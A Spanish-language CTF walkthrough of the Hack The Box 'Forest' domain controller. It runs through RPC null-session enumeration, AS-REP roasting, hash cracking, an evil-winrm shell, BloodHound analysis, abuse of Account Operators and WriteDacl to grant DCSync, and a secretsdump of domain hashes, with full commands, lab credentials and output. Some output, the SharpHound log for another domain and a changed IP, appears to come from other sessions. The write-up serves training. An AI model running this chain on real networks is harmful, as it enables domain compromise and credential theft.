Entrada

Forest

Publicado Actualizado
Preview Image
Por Justice-Reaper
17 min de lectura
Forest

Skills

  • RPC Enumeration - Getting valid domain users
  • Performing an AS-RepRoast attack with the obtained users
  • Cracking Hashes
  • Abusing WinRM - EvilWinRM
  • BloodHound Enumeration
  • Gathering system information with SharpHound.ps1
  • Representing and visualizing data in BloodHound
  • Finding an attack vector in BloodHound
  • Abusing Account Operators Group - Creating a new user
  • Abusing Account Operators Group - Assigning a group to the newly created user
  • Abusing WriteDacl in the domain - Granting DCSync Privileges
  • DCSync Exploitation - Secretsdump.py

Certificaciones

  • OSCP
  • OSEP
  • eCPPTv3

Descripción

Forest es una máquina easy windows, nos encontramos ante un Controlador de Dominio (DC). Se ha descubierto que el DC permite enumerar RPC mediante un null session , lo que se utiliza para enumerar usuarios del dominio. Con la lista de usuarios efectuamos un ASREPRoast Attack y obtenemos el hash de un usuario el cual crackeamos, con estas credenciales nos conectamos a la máquina víctima a través de winrm. Para escalar privilegios abusamos del grupo Account Operators para crear un usuario que con el privilegio DCSync mediante el cual podemos dumpear todos los hashes NTLM de los usuario del dominio y conectarnos con psexec como el usuario administrator

Reconocimiento

Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad

1
2
3
4
5
6
7
8
9
10

# ping 10.129.238.223
PING 10.129.238.223 (10.129.238.223) 56(84) bytes of data.
64 bytes from 10.129.238.223: icmp_seq=1 ttl=127 time=71.1 ms
64 bytes from 10.129.238.223: icmp_seq=2 ttl=127 time=61.3 ms
64 bytes from 10.129.238.223: icmp_seq=3 ttl=127 time=57.4 ms
64 bytes from 10.129.238.223: icmp_seq=4 ttl=127 time=58.7 ms
^C
--- 10.129.238.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 57.363/62.123/71.137/5.394 ms

Nmap

Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.238.223 -oG openPorts
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 00:24 CEST
Initiating SYN Stealth Scan at 00:24
Scanning 10.129.238.223 [65535 ports]
Discovered open port 139/tcp on 10.129.238.223
Discovered open port 53/tcp on 10.129.238.223
Discovered open port 445/tcp on 10.129.238.223
Discovered open port 135/tcp on 10.129.238.223
Discovered open port 49681/tcp on 10.129.238.223
Discovered open port 49665/tcp on 10.129.238.223
Discovered open port 49666/tcp on 10.129.238.223
Discovered open port 49668/tcp on 10.129.238.223
Discovered open port 49677/tcp on 10.129.238.223
Discovered open port 49676/tcp on 10.129.238.223
Discovered open port 50031/tcp on 10.129.238.223
Discovered open port 389/tcp on 10.129.238.223
Discovered open port 49698/tcp on 10.129.238.223
Discovered open port 47001/tcp on 10.129.238.223
Discovered open port 9389/tcp on 10.129.238.223
Discovered open port 464/tcp on 10.129.238.223
Discovered open port 3269/tcp on 10.129.238.223
Discovered open port 88/tcp on 10.129.238.223
Discovered open port 5985/tcp on 10.129.238.223
Discovered open port 636/tcp on 10.129.238.223
Discovered open port 3268/tcp on 10.129.238.223
Discovered open port 49664/tcp on 10.129.238.223
Discovered open port 593/tcp on 10.129.238.223
Discovered open port 49671/tcp on 10.129.238.223
Completed SYN Stealth Scan at 00:24, 14.92s elapsed (65535 total ports)
Nmap scan report for 10.129.238.223
Host is up (0.10s latency).
Not shown: 65165 closed tcp ports (reset), 346 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49681/tcp open  unknown
49698/tcp open  unknown
50031/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.02 seconds
           Raw packets sent: 73652 (3.241MB) | Rcvd: 67704 (2.708MB)

Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

# nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49676,49677,49681,49698,50031 10.129.238.223 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 00:24 CEST
Nmap scan report for 10.129.238.223
Host is up (0.099s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-16 22:31:48Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49681/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
50031/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-16T22:32:43
|_  start_date: 2024-08-16T22:22:19
|_clock-skew: mean: 2h26m49s, deviation: 4h02m31s, median: 6m48s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-08-16T15:32:42-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.72 seconds

RPC Enumeration

Enumeramos los usuarios con un null sesion usando la herramienta https://github.com/rubenza02/rpcenumeration y almacenamos los nombres de usuarios en un archivo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

# rpcenumeration -s 10.129.238.223 -n -f enum_users
Enumerando usuarios en el servidor 10.129.238.223...
Usuario              RID       
------               ---       
Administrator         0x1f4  
Guest                 0x1f5  
krbtgt                0x1f6  
DefaultAccount        0x1f7  
$331000-VK4ADACQNUCA  0x463  
SM_2c8eef0a09b545acb  0x464  
SM_ca8c2ed5bdab4dc9b  0x465  
SM_75a538d3025e4db9a  0x466  
SM_681f53d4942840e18  0x467  
SM_1b41c9286325456bb  0x468  
SM_9b69f1b9d2cc45549  0x469  
SM_7c96b981967141ebb  0x46a  
SM_c75ee099d0a64c91b  0x46b  
SM_1ffab36a2f5f479cb  0x46c  
HealthMailboxc3d7722  0x46e  
HealthMailboxfc9daad  0x46f  
HealthMailboxc0a90c9  0x470  
HealthMailbox670628e  0x471  
HealthMailbox968e74d  0x472  
HealthMailbox6ded678  0x473  
HealthMailbox83d6781  0x474  
HealthMailboxfd87238  0x475  
HealthMailboxb01ac64  0x476  
HealthMailbox7108a4e  0x477  
HealthMailbox0659cc1  0x478  
sebastien             0x479  
lucinda               0x47a  
svc-alfresco          0x47b  
andy                  0x47e  
mark                  0x47f  
santi                 0x480

SMB Enumeration

Listamos el dominio de la máquina víctima y el sistema operativo

1
2

# netexec smb 10.129.238.223                           
SMB         10.129.238.223  445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)

Añadimos el dominio al /etc/hosts

1
2
3
4
5
6
7
8

127.0.0.1       localhost
127.0.1.1       Kali-Linux
10.129.238.223  htb.local     

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Kerberos Enumeration

Sincronizamos nuestro reloj con el de la máquina víctima

1
2
3

# sudo ntpdate 10.129.238.223
2024-08-17 00:51:21.613694 (+0200) +408.815789 +/- 0.029180 10.129.238.223 s1 no-leap
CLOCK: time stepped by 408.815789

Efectuamos un ASREPRoast Attack usando el listado de usuarios válidos y obtenemos un hash debido a que el usuario svc-alfresco tiene el DONT_REQUIRE_PREAUTH seteado

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

# impacket-GetNPUsers htb.local/ -usersfile users     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:70456083b3d314a623348bf6475c651d$7855db22656a0d6e86857b361c09abbfdcc30478e80cf3dcf7e058ba0bad94735063b8b64d3bfe256d51ab2882110027dc9c67a808eb559c8016a1367fc4acb2f1f15d2fad99fc50b5c9b72cae81252855de0acb7a1cb873a2090c34e3eb8b943a0c9da7330491f05c1f6bc2887a113967ba760d19b645666f542c1956171d70a8dc20d462f636eb5752f5218c6e068abab6bc977ade2d375c7388c691f2818789a042f983b719275876957af71fc4c98c58a94c0e7da7a00b066d9307c39a0136e17044cee427a479dc0d09933e3d9fff0683490b10305e0bcc2f9a23fa0b5f8ad6790b7dac
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

Metemos el hash del usuario en un archivo y lo crackeamos con john

1
2
3
4
5
6
7
8
9

# john -w:rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)     
1g 0:00:00:01 DONE (2024-08-17 00:49) 0.6666g/s 2723Kp/s 2723Kc/s 2723KC/s s521379846..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Intrusión

Validamos que nuestro usuario se pueda conectar a través de winrm

1
2
3

# netexec winrm 10.129.238.223 -u 'svc-alfresco' -p 's3rvice'   
WINRM       10.129.238.223  5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
WINRM       10.129.238.223  5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

Nos conectamos a la máquina víctima

1
2
3
4
5
6
7
8
9
10
11

# evil-winrm -i 10.129.238.223 -u 'svc-alfresco' -p 's3rvice'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco

Privilege Escalation

Ejecutamos neo4j para proceder a una enumeración más profunda del directorio activo

1

# sudo neo4j console

Nos dirigimos a http://localhost:7474 y rellenamos los datos con las credenciales neo4j:neo4j

Introducimos una contraseña

Nos abrimos el bloodhound y nos logueamos

Listamos la versión de nuestro bloodhound, en este caso en la 4.3.1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

# apt show bloodhound                      

Package: bloodhound
Version: 4.3.1-0kali2
Priority: optional
Section: misc
Maintainer: Kali Developers <devel@kali.org>
Installed-Size: 274 MB
Depends: neo4j
Homepage: https://github.com/BloodHoundAD/BloodHound
Download-Size: 69.3 MB
APT-Manual-Installed: yes
APT-Sources: http://http.kali.org/kali kali-rolling/main amd64 Packages
Description: Six Degrees of Domain Admin
 This package contains BloodHound, a single page Javascript web application.
 BloodHound uses graph theory to reveal the hidden and often unintended
 relationships within an Active Directory environment. Attackers can use
 BloodHound to easily identify highly complex attack paths that would otherwise
 be impossible to quickly identify. Defenders can use BloodHound to identify and
 eliminate those same attack paths. Both blue and red teams can use BloodHound
 to easily gain a deeper understanding of privilege relationships in an Active
 Directory environment.

Nos descargamos sharphound https://github.com/BloodHoundAD/SharpHound/releases/tag/v1.1.1 y desde el mismo directorio donde está SharpHound.exe nos conectamos usando evil-winrm y subimos el archivo a la máquina víctima

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

# evil-winrm -i 10.129.95.180 -u 'svc-alfresco' -p 's3rvice' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
                                        
Info: Uploading /home/justice-reaper/Downloads/SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe
                                        
Data: 1402880 bytes of 1402880 bytes copied
                                        
Info: Upload successful!

Ejecutamos el binario

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe -c All
2024-08-16T18:57:06.1189643-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-08-16T18:57:06.2908347-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-08-16T18:57:06.3065202-07:00|INFORMATION|Initializing SharpHound at 6:57 PM on 8/16/2024
2024-08-16T18:57:06.4314748-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
2024-08-16T18:57:30.5408415-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-08-16T18:57:30.6971057-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2024-08-16T18:57:30.7283379-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-08-16T18:57:30.7283379-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-08-16T18:58:01.6190065-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-08-16T18:58:31.6346554-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-08-16T18:58:38.1033373-07:00|INFORMATION|Consumers finished, closing output channel
2024-08-16T18:58:38.1345828-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-08-16T18:58:38.2595849-07:00|INFORMATION|Status: 94 objects finished (+94 1.402985)/s -- Using 42 MB RAM
2024-08-16T18:58:38.2595849-07:00|INFORMATION|Enumeration finished in 00:01:07.5698477
2024-08-16T18:58:38.3377182-07:00|INFORMATION|Saving cache with stats: 53 ID to type mappings.
 53 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-16T18:58:38.3533340-07:00|INFORMATION|SharpHound Enumeration Completed at 6:58 PM on 8/16/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/16/2024   6:58 PM          11596 20240816185837_BloodHound.zip
-a----        8/16/2024   6:56 PM        1052160 SharpHound.exe
-a----        8/16/2024   6:58 PM           8601 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin

Nos descargamos el comprimido creado

1
2
3
4
5

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20240816185837_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20240816185837_BloodHound.zip to 20240816185837_BloodHound.zip
                                        
Info: Download successful!

Nos vamos al bloodhound y pulsamos en Upload data

Seleccionamos el usuario como owned

Seleccionamos Find Shortest Paths to Domain Admins

Nuestro usuario pertenece al grupo Accounts Operators el cual está autorizado para crear cuentas y grupos que no son administradores en el dominio. Creamos un usuario a nivel de dominio

1
2

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user pwned pwned123$! /add /domain
The command completed successfully.

Listamos todos los grupos del sistema

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
The command completed with one or more errors.

Añadimos el usuario al grupo Exchange Windows Permissions

1
2

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" pwned /add
The command completed successfully.

Revisamos a que grupos pertenece el usuario creado

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user pwned
User name                    pwned
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/17/2024 3:53:55 AM
Password expires             Never
Password changeable          8/18/2024 3:53:55 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Exchange Windows Perm*Domain Users
The command completed successfully.

Nos descargamos https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 y lo subimos a la máquina víctima, para ello debe estar en el mismo directorio desde el cual nos conectamos con evil-winrm

1
2
3
4
5
6
7

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
                                        
Info: Uploading /home/justice-reaper/PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!

Importamos el módulo

1

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-Module .\PowerView.ps1

Le añadimos el privilegio DCSync a nuestro usuario creado pwned

1
2
3

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'pwned123$!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\pwned', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity pwned -Rights DCSync

Dumpeamos los hashes NTLM de todos los usuarios del dominio entre ellos el usuario Administrator

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108

# impacket-secretsdump 'htb.local/pwned:pwned123$!@10.129.238.223'  
Impacket v0.12.0.dev1+20240816.161125.5d881ece - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
pwned:10101:aad3b435b51404eeaad3b435b51404ee:4e787817ede4b0b7e5e97bf763c2c6d4:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:3dc058f04ebbeff63e043c841c0b7950:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
